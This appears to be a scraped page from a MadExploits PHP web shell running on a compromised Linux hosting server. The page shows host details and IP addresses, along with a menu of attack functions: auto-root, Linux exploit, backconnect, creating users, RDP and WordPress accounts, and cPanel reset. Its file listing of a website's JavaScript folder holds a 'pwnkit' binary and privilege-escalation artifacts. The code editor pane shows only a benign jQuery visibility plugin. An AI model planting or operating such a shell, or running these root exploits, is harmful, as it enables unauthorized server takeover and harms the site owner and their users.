Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.227.46.87
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
noormertech /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
app.js
2.75
KB
-rw-r--r--
appear.js
4.28
KB
-rw-r--r--
bootstrap.min.js
49.54
KB
-rw-r--r--
element-in-view.js
3.45
KB
-rw-r--r--
isotope.js
36.89
KB
-rw-r--r--
jquery-ui.js
526.78
KB
-rw-r--r--
jquery.fancybox.js
150.49
KB
-rw-r--r--
jquery.js
83.57
KB
-rw-r--r--
map-script.js
4.72
KB
-rw-r--r--
owl.js
83.3
KB
-rw-r--r--
paroller.js
8.6
KB
-rw-r--r--
particles.js
42
KB
-rw-r--r--
popper.min.js
20.02
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
script.js
8.73
KB
-rw-r--r--
validate.js
20.4
KB
-rw-r--r--
wow.js
6.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : element-in-view.js
(function($) { /** * Copyright 2012, Digital Fusion * Licensed under the MIT license. * http://teamdf.com/jquery-plugins/license/ * * @author Sam Sehnert * @desc A small plugin that checks whether elements are within * the user visible viewport of a web browser. * only accounts for vertical position, not horizontal. */ $.fn.visible = function(partial) { var $t = $(this), $w = $(window), viewTop = $w.scrollTop(), viewBottom = viewTop + $w.height(), _top = $t.offset().top, _bottom = _top + $t.height(), compareTop = partial === true ? _bottom : _top, compareBottom = partial === true ? _top : _bottom; return ((compareBottom <= viewBottom) && (compareTop >= viewTop)); }; })(jQuery); $(window).on('scroll', function() { $(".testimonial-section .image-column .inner-column .author-one, .testimonial-section .image-column .inner-column .author-two, .testimonial-section .image-column .inner-column .author-three, .testimonial-section .image-column .inner-column .author-four, .testimonial-section .image-column .inner-column .author-five, .testimonial-section .image-column .inner-column .author-six, .testimonial-section .image-column .inner-column .author-seven, .testimonial-section .image-column .inner-column .author-eight, .testimonial-section .image-column .inner-column .author-nine, .testimonial-section .image-column .inner-column .author-ten, .testimonial-section .image-column .inner-column .author-eleven, .testimonial-section-two .image-column .inner-column .author-one, .testimonial-section-two .image-column .inner-column .author-two, .testimonial-section-two .image-column .inner-column .author-three, .testimonial-section-two .image-column .inner-column .author-four, .testimonial-section-two .image-column .inner-column .author-five, .testimonial-section-two .image-column .inner-column .icon").each(function(i, el) { var el = $(el); if (el.visible(true)) { el.addClass("now-in-view"); } else { el.removeClass("now-in-view"); } }); }); $(document).on('ready', function() { $(".testimonial-section .image-column .inner-column .author-one, .testimonial-section .image-column .inner-column .author-two, .testimonial-section .image-column .inner-column .author-three, .testimonial-section .image-column .inner-column .author-four, .testimonial-section .image-column .inner-column .author-five, .testimonial-section .image-column .inner-column .author-six, .testimonial-section .image-column .inner-column .author-seven, .testimonial-section .image-column .inner-column .author-eight, .testimonial-section .image-column .inner-column .author-nine, .testimonial-section .image-column .inner-column .author-ten, .testimonial-section .image-column .inner-column .author-eleven, .testimonial-section-two .image-column .inner-column .author-one, .testimonial-section-two .image-column .inner-column .author-two, .testimonial-section-two .image-column .inner-column .author-three, .testimonial-section-two .image-column .inner-column .author-four, .testimonial-section-two .image-column .inner-column .author-five, .testimonial-section-two .image-column .inner-column .icon").each(function(i, el) { var el = $(el); if (el.visible(true)) { el.addClass("now-in-view"); } else { el.removeClass("now-in-view"); } }); });
Close